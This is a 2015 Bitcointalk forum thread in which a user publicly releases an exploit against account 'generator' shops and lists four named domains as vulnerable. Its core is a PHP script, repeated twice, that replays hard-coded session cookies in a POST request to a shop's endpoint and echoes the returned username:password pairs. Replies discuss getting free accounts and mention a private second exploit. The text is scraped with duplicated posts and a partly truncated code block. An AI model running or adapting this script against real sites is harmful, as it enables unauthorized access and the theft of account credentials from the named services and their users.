Is it possible with this exploit that people can generate accounts for free?
yeah you can do a lot...
https://bitcointalksearch.org/topic/--1148789
Topic: Public Announcement for Digital Goods Generator shops. Exploit (Read 1153 times)
yeah you can do a lot...
https://bitcointalksearch.org/topic/--1148789
September 28, 2015, 02:40:34 PM
Is it possible with this exploit that people can generate accounts for free?
September 28, 2015, 01:52:04 PM
I do run the best generator on Hackforums, yep.
alright hit u up a pm
September 28, 2015, 01:27:37 PM
I do run the best generator on Hackforums, yep.
September 28, 2015, 01:04:32 PM
I tried hiring a coder to get the vulns fixed but everyone was an idiot and took to long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.
You own a shop too?
September 28, 2015, 01:01:21 PM
I tried hiring a coder to get the vulns fixed but everyone was an idiot and took to long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.
September 28, 2015, 12:44:41 PM
https://bitcointalksearch.org/topic/m.12540096
Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?
Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?
That version is fixed that I have but seems the owners are too hot headed to ignore me. So here I am.
September 28, 2015, 12:41:51 PM
https://bitcointalksearch.org/topic/m.12540096
Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?
Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?
September 28, 2015, 12:34:31 PM
Hey guys so I have been contacting multiple gen shop owners of this exploit but they either become very defensive or just ends up trying to make lies. Then they begin to act very rude to me.
Update: after this announcement owner of script gave up and doesn't know how to fix the script lol
I was very firm about not posting the exploit but due to multiple threats and lies from them I will just be posting it.
Disclaimer: It is not my fault if their site gets hacked as I warned them and they encouraged me to post. So if any owners blame me they already gave me permission to do so.
There is a 2nd exploit that dumps more stuff but that will be kept private for obvious reasons as it would not be allowed to be posted here
Alright so the exploit is a php code that you can host anywhere. Don't bother asking me on how to use this as you must already know what this does and how to use it.
The new owner of this source has been lying to members that this was a v1 exploit but it still works on v2 and the new owner has never updated the source at all! all he did was rename it which can be confirmed by talking to the original owner.
Current shops exploitable:
premiumgen.xyz
vzngen.net
25cams.com
raidgenerator.com
also any shops you find that use similar source. There is currently only 1 shop I know here that has a fixed source and its not the ones above.
Update: after this announcement owner of script gave up and doesn't know how to fix the script lol
I was very firm about not posting the exploit but due to multiple threats and lies from them I will just be posting it.
Disclaimer: It is not my fault if their site gets hacked as I warned them and they encouraged me to post. So if any owners blame me they already gave me permission to do so.
There is a 2nd exploit that dumps more stuff but that will be kept private for obvious reasons as it would not be allowed to be posted here
Alright so the exploit is a php code that you can host anywhere. Don't bother asking me on how to use this as you must already know what this does and how to use it.
The new owner of this source has been lying to members that this was a v1 exploit but it still works on v2 and the new owner has never updated the source at all! all he did was rename it which can be confirmed by talking to the original owner.
Code:
if($_GET['auth']=="max"){
$url = '';
$options = array(
'http' => array(
'method' => 'POST',
'header' => "Host:
" .
"User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
" .
"X-Requested-With: XMLHttpRequest
" .
"Cookie: ; remember_82e5d2c56bdd0811318f0cf078b78bfc=eyJpdiI6ImxuR21neVJucWE0VXRZYXpGd29WeXc9PSIsInZhbHVlIjoiOG1FM2NheHBGRUVDdE1qK2N4NzR0OGhUK3FxTE1zMEI4SzhmRGhsMHYwK2FEdkZTcjF1VlwvZDVsZE9tVTc0MFZuaHBxR2VxR1VSemdUczQyNjFIdFMxS3o0MzkrMW80Z2ZvOHlyXC9haHlPVT0iLCJtYWMiOiIzMmQ2OTI4MTk3OTI3NjVlYWNiZmFiMmVmNmZkZmQ3MTM0NDY5ZjBmY2RmOTQ1ODM5YTYwNWUzNGIzN2MxNDQzIn0%3D; __utma=191036587.1210061233.1437918069.1437944919.1437986125.3; __utmb=191036587.12.10.1437986125; __utmc=191036587; __utmz=191036587.1437918069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mcdispenser=eyJpdiI6Im1xa1ZJR3ZBMmhxOFE1eEpCSFI3eXc9PSIsInZhbHVlIjoiR2ZqTUZLQU12YWVUQTNkWkRka2U5MU90QUR4WVlJMWdhTWNKdTBTNEMwV0VBc09xOTZKT1RhRXQ1bkc5SVlrS1NkNFh5MlJ6MHBYVjQxcU5pTVwvNXl3PT0iLCJtYWMiOiJhMTRkMTNiNWI0MDM1ZTYxNmNkOGRjYzBiYmFkYjQzNTZhMDI0ZmQzZTE1NDQxYTQ5MTYyYWE4MGQ2ODdkMmIyIn0%3D
",
),
);
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
$up = json_decode($result);
$user = $up->username;
$pass = $up->password;
if($up->error == 'You may only generate an account once every 3 seconds.'){
echo 'err_3s';
}else{
echo $user . ':' . $pass;
}
}else{
echo "You aren't authorized to use this api!";
}
?>
$url = '';
$options = array(
'http' => array(
'method' => 'POST',
'header' => "Host:
" .
"User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
" .
"X-Requested-With: XMLHttpRequest
" .
"Cookie: ; remember_82e5d2c56bdd0811318f0cf078b78bfc=eyJpdiI6ImxuR21neVJucWE0VXRZYXpGd29WeXc9PSIsInZhbHVlIjoiOG1FM2NheHBGRUVDdE1qK2N4NzR0OGhUK3FxTE1zMEI4SzhmRGhsMHYwK2FEdkZTcjF1VlwvZDVsZE9tVTc0MFZuaHBxR2VxR1VSemdUczQyNjFIdFMxS3o0MzkrMW80Z2ZvOHlyXC9haHlPVT0iLCJtYWMiOiIzMmQ2OTI4MTk3OTI3NjVlYWNiZmFiMmVmNmZkZmQ3MTM0NDY5ZjBmY2RmOTQ1ODM5YTYwNWUzNGIzN2MxNDQzIn0%3D; __utma=191036587.1210061233.1437918069.1437944919.1437986125.3; __utmb=191036587.12.10.1437986125; __utmc=191036587; __utmz=191036587.1437918069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mcdispenser=eyJpdiI6Im1xa1ZJR3ZBMmhxOFE1eEpCSFI3eXc9PSIsInZhbHVlIjoiR2ZqTUZLQU12YWVUQTNkWkRka2U5MU90QUR4WVlJMWdhTWNKdTBTNEMwV0VBc09xOTZKT1RhRXQ1bkc5SVlrS1NkNFh5MlJ6MHBYVjQxcU5pTVwvNXl3PT0iLCJtYWMiOiJhMTRkMTNiNWI0MDM1ZTYxNmNkOGRjYzBiYmFkYjQzNTZhMDI0ZmQzZTE1NDQxYTQ5MTYyYWE4MGQ2ODdkMmIyIn0%3D
",
),
);
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
$up = json_decode($result);
$user = $up->username;
$pass = $up->password;
if($up->error == 'You may only generate an account once every 3 seconds.'){
echo 'err_3s';
}else{
echo $user . ':' . $pass;
}
}else{
echo "You aren't authorized to use this api!";
}
?>
Current shops exploitable:
premiumgen.xyz
vzngen.net
25cams.com
raidgenerator.com
also any shops you find that use similar source. There is currently only 1 shop I know here that has a fixed source and its not the ones above.
Jump to: